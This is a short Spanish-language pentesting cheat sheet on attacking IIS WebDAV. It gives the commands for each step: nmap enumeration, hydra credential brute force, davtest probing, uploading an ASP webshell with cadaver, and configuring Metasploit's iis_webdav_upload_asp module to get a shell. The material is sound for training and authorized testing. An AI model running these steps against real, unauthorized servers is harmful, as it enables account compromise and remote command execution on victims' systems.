WebDAV es una extensión de HTTP que facilita la gestión colaborativa de archivos en servidores web a
través de IIS (Servicios de Información de Internet). Permite realizar operaciones como crear,
modificar y mover documentos en un servidor directamente desde un cliente.
Para configurarlo, se utiliza el Administrador de IIS, que ofrece herramientas para ajustar
configuraciones de WebDAV
:: 🔎 Enumeración de Directorio Webdav Activo
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
nmap -sV -p 80 —script=http-enum <IP>/
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: 🔐 Fuerza Bruta Usuarios y Pass
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
hydra -L <diccionario de usuarios> -P <diccionario de contraseñas> <ip> http-get /webdav/
└───────────────────────────────────────────────────────────────────────────────────────────────────
:: ▸ Explotación con Davtest (Manual)
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
davtest -auth <user>:<password> -url <URL>/webdav
└───────────────────────────────────────────────────────────────────────────────────────────────────
Esto nos dira que tipo de archivo podemos subir (.asp, .js, .php ....) y nos dirá cual ejecutar
~ ▸ Subida archivos con Cadaver (webshell)
Cadaver es una herramienta de línea de comandos utilizada para interactuar con servidores WebDAV. Es
especialmente útil para subir, descargar, y gestionar archivos en un servidor WebDAV. En el contexto
de pentesting, `cadaver` se emplea para cargar webshells o ejecutar otras acciones que permitan
explorar las capacidades de carga de archivos en aplicaciones web vulnerables.
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
cadaver <URL>/webdav
└───────────────────────────────────────────────────────────────────────────────────────────────────
Indicamos user y password y nos devuelve una shell
Generamos un payload con msfvenom (explicado más abajo), o descargamos un archivo webshell con
extensión asp. En Kali y Parrot se encuentran en la ruta /usr/share/webshells/asp/webshell.asp
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
put /usr/share/webshells/asp/webshell.asp
└───────────────────────────────────────────────────────────────────────────────────────────────────
Despues accedemos en el navegador a la ruta donde hayamos subido la webshell y ya la tenemos lista
para poder ejecutar comandos
:: ▸ Explotación con Metasploit (Recomendado)
Modulo a usar exploit/windows/iis/iis_webdav_upload_asp
┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/iis/iis_webdav_upload_asp
set HttpUsername <username>
set HttpPassword <password>
set RHOSTS <IP víctima>
set PATH /webdav/metasploit.asp
└───────────────────────────────────────────────────────────────────────────────────────────────────
Obtenemos la shell